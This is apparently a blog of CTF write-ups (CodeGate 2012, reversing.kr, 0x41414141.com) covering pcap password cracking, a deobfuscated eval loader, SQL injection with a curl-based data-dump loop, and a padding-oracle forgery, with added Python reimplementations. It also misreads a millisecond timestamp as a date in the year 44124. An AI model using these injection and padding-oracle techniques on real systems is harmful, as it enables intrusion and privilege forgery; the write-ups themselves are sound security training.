Thursday, May 30, 2013

CodeGate CTF 2012 : Misc - 300 Points

Puzzle given to us:
A PCAP file is given to us. Find the key to a locked PDF file contained in the pcap.
File:56C5A2B69084AEC379406CEB42CEC70C

Recommended Tools:
http://pdfcrack.sourceforge.net/
jnetpcap API
wireshark
notepad++
netbeans

Analysing the File:
Analyzing the pcap file in Wireshark will eventually lead you to realize that there are 3 PDF files in it. You may use the display filter tcp contains "pdf" to pick out the packets and then Follow TCP Stream to trace the flow. Next I saved the stream data to a file and opened it in Notepad++, pruned the useless data leaving only the PDF binary, and saved the result as a .pdf file.

Solving the puzzle:
After extracting the 3 PDF files from the pcap, you will realize that 1 of them is password protected.

There are a few ways to go about breaking the password in such a short time frame:

  1. The password is in the pcap file hidden in one of the messages
  2. The password is in the other 2 pdf files
  3. The password is a common password that is brute forceable

The best bet is to try point 3 first. We begin by running a script/program that parses the packet payloads into text and tokenizes them into words. These words form a dictionary that is passed to a PDF password cracking program, which enumerates the candidates and attempts to open the file. I downloaded pdfcrack and used it in a VM for this puzzle.

I wrote a Java app in under 15 mins by grabbing online examples here and there to form this ugly duck... You may choose to rewrite it or wait a while longer for me to rewrite a proper program.

import java.io.BufferedWriter;
import java.io.FileWriter;
import java.io.IOException;
import java.net.URL;
import java.util.Date;
import java.util.StringTokenizer;
import org.jnetpcap.Pcap;
import org.jnetpcap.packet.PcapPacket;
import org.jnetpcap.packet.PcapPacketHandler;
import com.gargoylesoftware.htmlunit.StringWebResponse;
import com.gargoylesoftware.htmlunit.WebClient;
import com.gargoylesoftware.htmlunit.html.HTMLParser;
import com.gargoylesoftware.htmlunit.html.HtmlPage;

public class PCap {
  public static void main(String[] args) throws IOException {
    final StringBuilder errbuf = new StringBuilder(); // For any error msgs
    final String file = "300.pcap";

    System.out.printf("Opening file for reading: %s%n", file);
    final Pcap pcap = Pcap.openOffline(file, errbuf);
    if (pcap == null) {
      System.err.printf("Error while opening file for reading: %s%n", errbuf);
      return;
    }

    // Every printable token seen in any packet goes to out.dic, one per line
    final BufferedWriter out = new BufferedWriter(new FileWriter("out.dic"));
    final WebClient client = new WebClient();

    PcapPacketHandler<String> jpacketHandler = new PcapPacketHandler<String>() {
      public void nextPacket(PcapPacket packet, String user) {
        try {
          System.out.printf("Received at %s caplen=%-4d len=%-4d %s%n",
              new Date(packet.getCaptureHeader().timestampInMillis()),
              packet.getCaptureHeader().caplen(),  // Length actually captured
              packet.getCaptureHeader().wirelen(), // Original length
              user);                               // User supplied object
          // Convert HTML into text using HtmlUnit. I don't want HTML tags!
          String s = packet.getUTF8String(0, packet.getTotalSize());
          URL url = new URL("http://www.example.com");
          StringWebResponse response = new StringWebResponse(s, url);
          HtmlPage page = HTMLParser.parseHtml(response, client.getCurrentWindow());
          String data = page.asText();
          StringTokenizer st = new StringTokenizer(data);
          while (st.hasMoreTokens()) {
            String token = st.nextToken();
            boolean err = false;
            for (int i = 0; i < token.length(); i++) { // I only want printable ASCII
              if (token.charAt(i) < 32 || token.charAt(i) > 126) {
                err = true;
                break;
              }
            }
            if (!err)
              out.write(token + "\n");
          }
        } catch (Exception ex) {
          // A packet that does not parse as HTML is simply skipped
        }
      }
    };

    try {
      pcap.loop(Pcap.LOOP_INFINITE, jpacketHandler, "jNetPcap rocks =D!");
    } finally {
      pcap.close();
      out.close();
    }
  }
}

After 9000+ attempts the password to the locked file is found! Woohoo... the password of the locked file is 28-letter.
Final answer: 23FB0EC48DF3EACABCA9E98E8CA24CD1 after strupr(md5('28-letter'))
OK, someone told me a one-line solution >_<
In a Mac OS terminal type this command: strings 300.pcap | tr ' ' '\n' > 300_strings.dic
OK, me noob >_<
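The dictionary-building step, as an added Python example (not the author's Java program and not the challenge capture): a minimal classic-pcap reader that pulls printable tokens from every packet, crudely strips HTML tags as the Java version did with HtmlUnit, and de-duplicates them into a wordlist. SAMPLE_PCAP is a constructed two-packet capture, so the script runs offline.

```python
import re
import struct


def _record(payload: bytes) -> bytes:
    """One pcap record: ts_sec, ts_usec, incl_len, orig_len, then the bytes."""
    return struct.pack("<IIII", 1330000000, 0, len(payload), len(payload)) + payload


# Constructed sample capture: global header + two records with a 14-byte fake
# Ethernet header each. The "password" here is made up for the example.
SAMPLE_PCAP = (
    struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)  # link type 1 = Ethernet
    + _record(b"\x00" * 14 + b"<html><body>Hi Bob, the PDF password is 28-letter</body></html>")
    + _record(b"\x00" * 14 + b"%PDF-1.4\n\xff\xfe\x01binary\x00junk")
)

TAG_RE = re.compile(rb"<[^>]*>")


def pcap_payloads(data: bytes):
    """Yield the captured bytes of every record in a classic pcap file.
    Handles both byte orders of the magic and stops cleanly at a truncated record."""
    magic = data[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        endian = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    pos = 24  # skip the 24-byte global header
    while pos + 16 <= len(data):
        _sec, _usec, incl_len, _orig = struct.unpack(endian + "IIII", data[pos:pos + 16])
        pos += 16
        if pos + incl_len > len(data):  # truncated capture: keep what we have
            break
        yield data[pos:pos + incl_len]
        pos += incl_len


def printable_tokens(payload: bytes, min_len: int = 4):
    """Split a payload on non-printable bytes and whitespace, like `strings | tr`,
    after replacing HTML tags with spaces so tag names do not pollute the list."""
    payload = TAG_RE.sub(b" ", payload)
    tokens, cur = [], bytearray()
    for b in payload:
        if 33 <= b <= 126:  # printable, non-space ASCII only
            cur.append(b)
        else:
            if len(cur) >= min_len:
                tokens.append(cur.decode("ascii"))
            cur = bytearray()
    if len(cur) >= min_len:
        tokens.append(cur.decode("ascii"))
    return tokens


def build_wordlist(data: bytes, min_len: int = 4):
    """Unique tokens from all packets, in first-seen order, one candidate per line for pdfcrack."""
    seen, words = set(), []
    for payload in pcap_payloads(data):
        for tok in printable_tokens(payload, min_len):
            if tok not in seen:
                seen.add(tok)
                words.append(tok)
    return words


if __name__ == "__main__":
    with open("out.dic", "w") as fh:
        fh.write("\n".join(build_wordlist(SAMPLE_PCAP)) + "\n")
```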

cheers
Elucidator

CodeGate Qualifiers CTF 2012 : Misc #4 - 300 Points

Given Hints:
This is the original file:
File:Codegate_site.zip

Recommended Tool:
Online JavaScript Beautifier (http://jsbeautifier.org/) - Beautify, unpack or deobfuscate JavaScript

Identifying File:
For this challenge, we are provided with only a zipped file containing the files of the CodeGate homepage. Opening the index page (codegate_homepage.htm) in a browser does not show anything interesting. However, we discover something peculiar when we look at the source code:
Line 247: <script>c(' … ');</script>
At line 247 of codegate_homepage.htm, a very long statement containing ~11k whitespace characters stands out from the rest of the code. This is clearly an important lead that directs us to look for the function c in the JavaScript file (codegate.js).
At line 231 of codegate.js lies the obfuscated code for function c. Deobfuscating the code reveals the following:
function c(_0x272dx2) {
    _0x272dx2 = _0x272dx2['replace'](/ /g, 1);
    _0x272dx2 = _0x272dx2['replace'](/\t/g, 0);
    var _0x272dx3 = _0x272dx2;
    _0x272dx2 = "";
    for (i = 0; i < _0x272dx3['length']; i++) {
        _0x272dx2 = _0x272dx3['substring'](i, i + 1) + _0x272dx2
    };
    var _0x272dx4 = "";
    for (i = 0; i < _0x272dx2['length']; i += 9) {
        _0x272dx4 += String['fromCharCode'](parseInt(_0x272dx2['substring'](i, i + 9), 2))
    };
    eval(_0x272dx4)
};

What the code does is replace every space with the digit 1 and every tab with the digit 0, reverse the resulting bit string, and decode it in 9-bit groups into characters that are handed to eval. We can pass the variable _0x272dx4 to the alert function instead to see the code that would be passed to eval:
if (new Date().getTime() > 1330268400000) {
    var dummya = '1';
    var dummyb = '1';
    var dummyv = '1';
    var dummyc = '1';
    var dummys = '1';
    var dummyae = '1';
    var dummyasefa = '1';
    var dummeya = '1';
    var dummya = '1';
    var dum3mya = '1';
    var dumm54ya = '1';
    var dumm3ya = '1';
    var dum1mya = '1';
    var p = 'YTK4YPT1YK48PTK48TK34PTYK6TDKT5P2KT73TKPY4TBTK3TT4YKT4ETK4YTP7K4T6KT30TKYP7T2KYT33TKP7TY6KTYP33TKPY7PT2YT';
    p = p.replace(/T/g,'').replace(/P/g,'').replace(/Y/g,'').replace(/K/g,'%');
    //var authkey =     unescape(p);
}
As we can see here, this portion of code compares the current timestamp against a specified Unix timestamp that is equivalent to "Wed, 12 Jul 44124 00:00:00 GMT". Within the if statement lies a series of dummy variables that are assigned the value '1' but are not used anywhere else. What follows is the assignment of a string of hexadecimal values to the variable p, the removal of all instances of 'T', 'P' and 'Y' from it, and the replacement of all instances of 'K' with '%'.

Variable p
----------
Before: YTK4YPT1YK48PTK48TK34PTYK6TDKT5P2KT73TKPY4TBTK3TT4YKT4ETK4YTP7K4T6KT30TKYP7T2KYT33TKP7TY6KTYP33TKPY7PT2YT
After: %41%48%48%34%6D%52%73%4B%34%4E%47%46%30%72%33%76%33%72
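Both decoding stages of this challenge, reimplemented as an added Python example (not the challenge's JavaScript) so the payload can be inspected without ever calling eval. The string passed to recover_p is the page's own value of p; encode_c_payload is only there to build a round-trip test vector.

```python
import urllib.parse


def decode_c_payload(blob: str) -> str:
    """Undo what function c does, minus the eval: spaces -> '1', tabs -> '0',
    reverse the bit string, then read it as 9-bit character codes."""
    bits = blob.replace(" ", "1").replace("\t", "0")
    if set(bits) - {"0", "1"}:
        raise ValueError("payload must consist of spaces and tabs only")
    bits = bits[::-1]
    if len(bits) % 9:
        raise ValueError("bit string is not a multiple of 9 bits")
    return "".join(chr(int(bits[i:i + 9], 2)) for i in range(0, len(bits), 9))


def encode_c_payload(code: str) -> str:
    """Inverse of decode_c_payload: 9 bits per character, whole string reversed,
    '1' -> space and '0' -> tab. Used here only to construct a test vector."""
    bits = "".join(format(ord(ch), "09b") for ch in code)[::-1]
    return bits.replace("1", " ").replace("0", "\t")


def strip_noise(p: str) -> str:
    """Second stage, step one: drop the T/P/Y noise letters and turn K into '%'."""
    return p.translate(str.maketrans("", "", "TPY")).replace("K", "%")


def recover_p(p: str) -> str:
    """Second stage, step two: the cleaned string is a %XX-escaped flag, so unescape it."""
    return urllib.parse.unquote(strip_noise(p))
```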
Final Solution:
We obtain the solution to this challenge by passing the variable p to the unescape function.
Flag: **AHH4mRsK4NGF0r3v3r**

cheers
Mr.D

CodeGate CTF 2012 : Vulnerability - 100 Points

Puzzle given to us:
The web application given to us contains:

  1. index page
  2. upload page (for uploading of mp3)
  3. player page (for playing of uploaded mp3)
  4. request_mp3 page (for downloading of mp3)

Question: What song is the administrator listening to?

Recommended Tools:
Live HTTP Headers (https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/)
Tamper Data (https://addons.mozilla.org/en-US/firefox/addon/tamper-data/)

Analysing the File:
There are 3 vulnerabilities here... but only 1 is useful for this puzzle:

  1. Full path disclosure via local file inclusion, found in the URL where the page is selected via ?page=upload or an empty ?page=
  2. XSS via inserting a script in the title text field of the upload page
  3. SQL injection in the genre field of the upload page

Solving the Puzzle:
The SQL injection was found through the use of Tamper Data while uploading an mp3. Modifying the integer value of the genre from "1" to " 1' " caused the mp3 upload to fail. Although no error message appears, it does seem that there is a SQL error. I would imagine the backend SQL code to be something like the following:
INSERT INTO xxx (a,b,c,d) VALUES (a,b,genre,title,d)
So my attack begins by changing the genre POST value to 1, database())#
Yeah, the attack works! Now the upload page displays the uploaded file's title as the name of the database.

OK, let's begin our attack using the genre field.

Get the table names from the database. There are tons of tables in the database, named in the pattern upload_mp3_<ip_address>:
1, (SELECT table_name FROM information_schema.tables where table_schema=database())#

Get the column names from the table (we use hex to bypass the single-quote problem in the SQL statement). The fields dumped are idx, genre, title, file:
1, (SELECT column_name FROM information_schema.columns where table_name=0xhextablename)#

Dump the fields:
1, (SELECT group_concat(title, 0x3a, file) from upload_mp3_127_0_0_1)#

Damn, the file field looks empty... or is it? Let's try this:
1, (SELECT length(file) from upload_mp3_127_0_0_1)#

Damn, the size is big...
Let's write a bash loop to dump it:
>> for i in `seq 0 32767 393204`; do ./vuln100.sh "SELECT hex(substring(file,$i,32767)) FROM upload_mp3_127_0_0_1" | xxd -r -p - >>vuln100.mp3; done;
vuln100.sh:
curl -s "http://1.234.41.8:7856/mp3_world/?page=upload" -F "mp3=@a.mp3;filename=mp3.mp3" -F "genre=2,($1))#" -F "title=a" 2>/dev/null >/dev/null
curl -s "http://1.234.41.8:7856/mp3_world/?page=player" | grep "name:" | awk -F "dance" '{print $2}' | awk -F '",filename' '{ print $1 }' | cut -c 2-
After running the bash script, an mp3 is formed, with the solution in the audio: UPL04DNPL4D
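The root cause, as an added Python example (not the challenge's PHP/MySQL code): the INSERT the page suspects, with form values spliced into the SQL, beside its parameterised form. It uses an in-memory SQLite database as a constructed stand-in, so the comment marker is SQLite's `--` rather than MySQL's `#`, and a second table plays the role of the data the genre field leaks into the title column.

```python
import sqlite3


def new_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge's backend: the upload table plus a
    table that holds something the uploader is not supposed to read."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE upload_mp3 (idx INTEGER PRIMARY KEY, file BLOB, genre INTEGER, title TEXT)")
    conn.execute("CREATE TABLE secret_table (note TEXT)")
    conn.execute("INSERT INTO secret_table VALUES ('sensitive row')")
    return conn


def last_title(conn: sqlite3.Connection) -> str:
    """What the player page shows: the title of the most recent upload."""
    return conn.execute("SELECT title FROM upload_mp3 ORDER BY idx DESC LIMIT 1").fetchone()[0]


def upload_vulnerable(conn: sqlite3.Connection, genre: str, title: str, data: bytes) -> str:
    """The pattern the page suspects: form values spliced straight into the statement.
    Because genre sits right before title, a genre of "1, (subquery)) --" supplies
    its own title value and comments out the real one."""
    sql = (f"INSERT INTO upload_mp3 (file, genre, title) "
           f"VALUES (X'{data.hex()}', {genre}, '{title}')")
    conn.execute(sql)
    return last_title(conn)


def upload_safe(conn: sqlite3.Connection, genre: str, title: str, data: bytes) -> str:
    """Hardened form: validate the type first, then bind every value as a parameter,
    so the database never sees user input as SQL."""
    genre_id = int(genre)  # "1, (SELECT ...)" raises ValueError before any SQL runs
    conn.execute("INSERT INTO upload_mp3 (file, genre, title) VALUES (?, ?, ?)",
                 (data, genre_id, title))
    return last_title(conn)


# The page's genre trick, in SQLite syntax: the subquery result becomes the title.
INJECTED_GENRE = "1, (SELECT note FROM secret_table)) --"
```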

cheers
Elucidator

CodeGate CTF 2012 : Vulnerability - 400 Points

Puzzle given to us:
A Web application is given to us in which it allows us to download a certificate that we can use to upload and login into the system as citizen. The objective is to find a way to login as king.

Recommended Tools:
-

Analysing the File:
Analyzing the downloaded file, it contains only 1 line (by the way, the line below is "randomized" every time you download it from the server):
vDxkdtmGels=KUdOWbuM0mE=

This file looks like two base64 strings to me, so let's decode them... the result seems to be garbage... hmmm, I wonder what it is...
So let's ignore the garbage ASCII for now and look at the decoded value as hex.

Let's then modify the contents by changing the end bytes of the 1st block and encode it back to base64. Submit the cert... we see a popup: padding error.
Crap, it's the padding oracle problem, as I had suspected =(

Solving the Puzzle:

Padding oracles have been used in some captcha algorithms. However, such an approach is vulnerable to attack. We are given 2 things, the IV and the encrypted message, so I guess that is what the two base64 strings given to us mean.

The attack begins like this... we do not touch the encrypted message; rather we modify the IV (initialization vector) so that we are able to recover the intermediate value of this padding oracle problem. Once the intermediate value is recovered, we have solved 90% of the puzzle. What we can do then is XOR the intended plaintext with the intermediate value and use the result as the IV.

Note: there are few errors that the web application will prompt to us... they are

  • Padding Error = the IV caused the plaintext padding to be malformed. Theoretically, if there are 2 empty spaces in a block the block should be "a b c d e f 0x02 0x02"; the hex 02 indicates how many padded bytes there are. If the IV causes the plaintext to be "a b c d e f 0x01 0x02", this will cause a padding error.
  • Class Error = this is generated when you change the IV such that the web application logic is unable to determine which class you belong to. For instance, let's say you are a citizen and somehow you changed one of the bytes, making it citazen. This will generate a class error.


The above is a brief summary of how an attacker would approach this problem. Now for the step by step illustration.


  1. Decode the base64.
  2. Convert it to hex.
  3. Generate 256 different values for the last byte of the IV.
  4. Upload each to the server to test the result.
  5. Only 1 logs in successfully; the rest are all padding errors.
  6. The last plaintext byte is then 0x01. [Reason: if the last byte were 0x02, we should get 2 non-padding errors.]
  7. Since we know the plaintext byte (0x01) and we know the IV hex, we can derive the intermediate value as (0x01 ^ IV's last byte).
  8. Now we repeat steps 3 to 7 for the 2nd last byte of the intermediate value, but this time we form the IV in such a way that the last byte of the plaintext becomes 0x02.
  9. After brute-forcing 256 times we will have only 1 class error and the rest are padding errors... the class error indicates that we found the IV byte that forces that plaintext byte to 0x02. From it we derive the 2nd last byte of the intermediate value.
  10. The above steps repeat until we get the full intermediate value.


Once we have the intermediate value, we can derive the plaintext easily by taking the IM XOR the IV. We found that the plaintext is actually nezitic0x01, which stands for citizen with 1 byte of padding. So using my spider sense we change this plaintext into king followed by 4 bytes of padding, which is ...gnik0x040x040x040x04, and XOR it with the IM to get the IV needed to do the spoofing job. We re-encode the data into base64 and resubmit the ctf file to the server. =D We are logged in as the king!

My original CTF file contents: vDxkdtmGels=KUdOWbuM0mE=
My edited CTF File contents is: tTd3dKnrHV4=KUdOWbuM0mE=
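The whole procedure in code, as an added Python example that is not the author's tooling: a local simulation of the server's certificate check with the three outcomes the page observed, the byte-by-byte recovery of the intermediate value (including the check for a false 0x01 at the last byte, which the page's step 6 reasons about), and the forging of a new IV. block_decrypt is a constructed keyed stand-in for the cipher's decryption, since the attack only needs the padding check; the role bytes follow the byte order the page observed ('nezitic', 'gnik').

```python
import base64
import hashlib

BLOCK = 8
SERVER_KEY = b"constructed-demo-key"  # stand-in for the server secret; the attacker never sees it
ROLES = {b"nezitic": "citizen", b"gnik": "king"}  # the decrypted bytes as the page read them


def block_decrypt(c: bytes) -> bytes:
    """Stand-in for D_k(C): deterministic and keyed, unknown to the attacker.
    Which cipher sits here does not matter to the attack; only the padding check does."""
    return hashlib.sha256(SERVER_KEY + c).digest()[:BLOCK]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def pad(msg: bytes) -> bytes:
    n = BLOCK - len(msg) % BLOCK
    return msg + bytes([n]) * n


def unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("padding error")
    return data[:-n]


def issue_cert(role: bytes) -> str:
    """Server side: pick a block C, set IV = D(C) xor pad(role), emit base64(IV) + base64(C)."""
    c = hashlib.sha256(b"cert-nonce" + role).digest()[:BLOCK]
    iv = xor(block_decrypt(c), pad(role))
    return base64.b64encode(iv).decode() + base64.b64encode(c).decode()


def parse_cert(text: str):
    """The file is two base64 strings back to back; each 8-byte block encodes to 12 characters."""
    return base64.b64decode(text[:12]), base64.b64decode(text[12:])


def oracle(iv: bytes, c: bytes) -> str:
    """The three outcomes the page observed: padding error, class error, or a login."""
    try:
        role = unpad(xor(block_decrypt(c), iv))
    except ValueError:
        return "padding error"
    return "ok" if role in ROLES else "class error"


def recover_intermediate(c: bytes) -> bytes:
    """Steps 3 to 10 of the page: from the last byte backwards, find the IV byte that
    makes the padding valid; then I[pos] = iv[pos] xor padlen."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padlen = BLOCK - pos
        iv = bytearray(BLOCK)
        for k in range(pos + 1, BLOCK):  # already-known bytes forced to the new pad value
            iv[k] = inter[k] ^ padlen
        for guess in range(256):
            iv[pos] = guess
            if oracle(bytes(iv), c) == "padding error":
                continue
            if pos == BLOCK - 1:
                # Last byte only: a 0x02 0x02 (or longer) pad could also pass. Disturbing
                # the previous byte breaks such a pad but leaves a genuine 0x01 intact.
                probe = bytearray(iv)
                probe[pos - 1] ^= 0xFF
                if oracle(bytes(probe), c) == "padding error":
                    continue
            inter[pos] = guess ^ padlen
            break
        else:
            raise RuntimeError(f"no valid padding found at byte {pos}")
    return bytes(inter)


def forge_cert(text: str, new_role: bytes) -> str:
    """Keep C, replace the IV with I xor pad(new_role)."""
    _iv, c = parse_cert(text)
    new_iv = xor(recover_intermediate(c), pad(new_role))
    return base64.b64encode(new_iv).decode() + base64.b64encode(c).decode()
```

The page's two certificate files can be checked the same way: they share C, and their IVs differ by exactly pad('nezitic') xor pad('gnik').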

cheers
Elucidator

CodeGate CTF 2012 : Forensics - 100 Points

I find the challenges in the Forensics category well written and fun. It's good when you're involved in malware and incident response.
However, the formatting of the solution(s) is what puts me off. Kudos to the organizer.

Hints given to us:
In order to steal financial information of Company X, IU got a job under cover.
She decided to attack CFO's computer, and then insert malicious code to his computer in the way of social engineering.
She figured out that he didn't use to turn off his computer, when he gets off work.
After he leaves the office, she obtains financial data from his computer to search EXCEL file.
By checking installed application program, she can find the information in the file. She lacks the file externally.
In order to remove all traces, she erases malicious code, event logs and recent file list.
The company X has to figure out what information she stole correctly to make an appropriate measure.
These are files attacked from CFO's computer. Find the full path and size of the file which she stole.
On the day, CFO left the office at 14:00. The time is based on Korea Standard Time(UTC +09:00).
Answer: strlwr(md5(full_path|file_size)) ('|' is just a character)
Download : 525321B9CEDAF3C8D35FC9071D5DD237

This is the original file, which I had to split into multiple parts due to file size restrictions:
525321B9CEDAF3C8D35FC9071D5DD237.7z.001
525321B9CEDAF3C8D35FC9071D5DD237.7z.002
525321B9CEDAF3C8D35FC9071D5DD237.7z.003
525321B9CEDAF3C8D35FC9071D5DD237.7z.004

Recommended Tools:
Windows File Analyzer (http://mitec.cz/wfa.html)
TRiD (http://mark0.net/soft-trid-e.html)

Analysing the File:
TrID shows that it's a 7-zip file. When I extract the contents, it seems to be the entire "Users" folder of a Windows Vista or Windows 7 user.
As the hints say, our main objective is to grab the Excel file. But wait, the hints also mention erasing all traces, so basically I can't just search for .xls.
OK, maybe the attacker deleted the file, but let's see whether the attacker also removed it from the "Recent" folder in Office.

As we can see from the image below, there are 2 previously opened Excel files, [Top-Secret]_2011_Financial_deals and Carving파일분석



Of the 2 Excel filenames, it is most probably the one with "Top-Secret".
The objective is to find out the full path and the file size first. As the file is deleted, we are left with the .lnk files.
Let's see what other tool(s) I have in my arsenal here.
I quickly copied out the shortcut (the .lnk file), whipped out WFA, and I can see the required information in the image below.



Solving the Puzzle:
Using all the gathered information, and since the answer has to be in the form
Answer: strlwr(md5(full_path|file_size)) ('|' is just a character)

So if we run the following command in Linux:
echo -n "C:\INSIGHT\Accounting\Confidential\[Top-Secret]_2011_Financial_deals.xlsx|9296" | md5sum

Using the md5 checksum that was returned to us, the key for Forensics 100 is : d3403b2653dbc16bbe1cfce53a417ab1

cheers
0x4a61636f62

Reversing.kr - Easy Crack (100pts)

This writeup had been sitting on my PC for some time.
I think it's probably a good time to release it. :D

You can register and download this file here.
http://reversing.kr/download.php?n=1
Alternatively, here is the mirror of the file.
Easy_CrackMe.zip

Required Tools:
IDA Pro

Initial Analysis:
Let's load this binary up with IDA Pro.


From the above image, we can see that "WinMain" calls "DialogFunc".

If we follow to "DialogFunc", we will see that it will call "sub_401080" as shown in the image below.


So let's take a quick look at "sub_401080". If you have practiced enough with keygens and crackmes, you will know by now that we should check out GetDlgItemText first.


Further Analysis on the Algorithm:
If we study it hard enough, we will see that after the application grabs the user's input, it compares the 2nd byte as shown here:
cmp byte ptr [esp+5], 61h ; Compare 2nd byte with 0x61.
This means that our 2nd character must be "a", since 61h is "a" according to http://www.asciitable.com/

Let's move on the 2nd comparison.

As we can see from the image above, it compares the user's 3rd and 4th bytes with "5y".

Now let's move downwards.

OK, now it loads the 5th byte up to the end of the user input and compares byte by byte with "R3versing".

Finally, we see another comparison. This time round, it compares the 1st byte with 0x45, which is "E".

Conclusion:
Now let's put together all the newly acquired clues from before the point where we are told whether the input key is valid or not:
E + a + 5y + R3versing == Ea5yR3versing

Now let's enter this key "Ea5yR3versing" and we have successfully solved this binary.

cheers
0x4a61636f62

Third Puzzle on 0x41414141.com

After solving the second challenge, we got an email reply with the following contents.

sweet.

Here's the C source:

int bar(){
    int x = 0xC0FFEE;
    return (x ^ (int)bar) ^ 0x8744EE;
}

int main(){
    int x = 0;
    x = bar("Email is return value of fn in form 0x12345678 zero padded to eight digits");
}

Now here's something a little different:

0x41414141.com/gzip/

good luck!
Visiting the above URL, I saw this image.


For this particular puzzle, I used Cerbero Profiler.
Loading the image into Cerbero Profiler, I was informed by Profiler that "1 chunks don't match their CRC. They are highlighted in the format view."
That particular chunk is zTXt, and if we read the PNG specification, its content is compressed.

Cerbero Profiler comes with many features. Let's do a quick filter on the chunk that we are interested in by selecting the hex bytes as shown below.


After that, add the zlib unpack filter to it, press preview, and you should see something like the image below.


The returned result is "pngRocks@challenge.0x41414141.com", and that is the email address which we should send to. :D

For people who are interested in an open-source solution, I've written a small Python script to do that:
pyDeflate.py
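An added Python example of the same extraction (my own code, not the author's pyDeflate.py): walk the PNG chunks, recompute each CRC over type + body, and inflate every zTXt chunk. SAMPLE_PNG is a constructed 1x1 image whose zTXt chunk carries a made-up address and, like the challenge's chunk, a deliberately wrong CRC.

```python
import struct
import zlib


def _chunk(ctype: bytes, body: bytes, corrupt_crc: bool = False) -> bytes:
    """Build one chunk: 4-byte length, type, body, CRC-32 over type + body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    if corrupt_crc:
        crc ^= 0x1  # deliberately wrong, like the chunk Profiler flagged
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


# Constructed sample: 1x1 greyscale PNG with a zTXt chunk whose CRC does not match.
HIDDEN = b"hidden@example.invalid"
SAMPLE_PNG = (
    b"\x89PNG\r\n\x1a\n"
    + _chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
    + _chunk(b"zTXt", b"Comment\x00" + b"\x00" + zlib.compress(HIDDEN), corrupt_crc=True)
    + _chunk(b"IDAT", zlib.compress(b"\x00\x00"))
    + _chunk(b"IEND", b"")
)


def png_chunks(data: bytes):
    """Yield (type, body, crc_ok) for each chunk. The CRC covers type and body, not the length."""
    if data[:8] != b"\x89PNG\r\n\x1a\n":
        raise ValueError("not a PNG file")
    pos = 8
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        stored = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])[0]
        yield ctype, body, stored == (zlib.crc32(ctype + body) & 0xFFFFFFFF)
        pos += 12 + length
        if ctype == b"IEND":
            break


def bad_crc_chunks(data: bytes):
    """Chunk types whose stored CRC does not match, the same check Profiler reported."""
    return [ctype.decode("latin-1") for ctype, _, ok in png_chunks(data) if not ok]


def ztxt_texts(data: bytes):
    """Decode every zTXt chunk: keyword, NUL, compression method (0 = zlib), compressed text."""
    out = []
    for ctype, body, crc_ok in png_chunks(data):
        if ctype != b"zTXt":
            continue
        keyword, rest = body.split(b"\x00", 1)
        method, compressed = rest[0], rest[1:]
        if method != 0:
            raise ValueError("unknown zTXt compression method")
        text = zlib.decompress(compressed).decode("latin-1")
        out.append((keyword.decode("latin-1"), text, crc_ok))
    return out


if __name__ == "__main__":
    for keyword, text, crc_ok in ztxt_texts(SAMPLE_PNG):
        print(f"{keyword}: {text!r} (crc ok: {crc_ok})")
```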

cheers
0x4a61636f62

Second Puzzle on 0x41414141.com

After solving the first challenge, we got an email reply with the following contents.

You've got the idea. E-mails don't require a subject or body.

Do those skills extend to a PE?

0x41414141.com/bfab4d3c076ac4059f3c1e680c7a6933/

Visiting the given URL, we are given a copy of the .exe.
Here is a backup of the binary in case the website disappears forever.
bfab4d3c076ac4059f3c1e680c7a6933.zip

Since it's an .exe let's load it up in OllyDbg and have a quick look.


From the above image, we can see that there is a clue, "Email is return value of fn in form 0x12345678 zero padded to eight digits"

Immediately, there is a function call to address 0x00401000.
It loads "0x0C0FFEE" into eax, XORs it with 0x401000, then XORs the value with 0x8744EE, and the result is "7AB00".

Looking at the hint again, the value has to be zero padded to eight digits, thus the email address which we should send to is 0x0007AB00@challenge.0x41414141.com


cheers
0x4a61636f62

First Puzzle on 0x41414141.com

Initial Stage:
When we go to 0x41414141.com, we see something that looks like a hex dump of some binary, as you can see below.

00000000 54 6d 6c 6a 5a 53 42 7a 64 47 46 79 64 43 34 67 |TmljZSBzdGFydC4g|
00000010 49 46 4e 31 63 6d 55 67 61 47 39 77 5a 53 42 35 |IFN1cmUgaG9wZSB5|
00000020 62 33 55 67 64 47 68 70 62 6d 73 67 61 58 51 67 |b3UgdGhpbmsgaXQg|
00000030 64 32 46 7a 49 48 4e 30 64 58 42 70 5a 43 42 7a |d2FzIHN0dXBpZCBz|
00000040 61 57 31 77 62 47 55 75 49 41 6f 4b 55 32 56 75 |aW1wbGUuIAoKU2Vu|
00000050 5a 43 42 68 62 69 42 6c 4c 57 31 68 61 57 77 67 |ZCBhbiBlLW1haWwg|
00000060 64 47 38 67 5a 6d 39 76 51 47 4e 6f 59 57 78 73 |dG8gZm9vQGNoYWxs|
00000070 5a 57 35 6e 5a 53 34 77 65 44 51 78 4e 44 45 30 |ZW5nZS4weDQxNDE0|
00000080 4d 54 51 78 4c 6d 4e 76 62 53 34 67 51 53 42 79 |MTQxLmNvbS4gQSBy|
00000090 5a 58 42 73 65 53 42 33 61 57 78 73 49 47 4a 6c |ZXBseSB3aWxsIGJl|
000000a0 49 48 4e 6c 62 6e 51 67 64 47 38 67 64 47 68 6c |IHNlbnQgdG8gdGhl|
000000b0 49 48 4a 6c 63 47 78 35 4c 58 52 76 49 47 46 6b |IHJlcGx5LXRvIGFk|
000000c0 5a 48 4a 6c 63 33 4d 67 59 32 39 75 64 47 46 70 |ZHJlc3MgY29udGFp|
000000d0 62 6d 6c 75 5a 79 42 30 61 47 55 67 56 56 4a 4d |bmluZyB0aGUgVVJM|
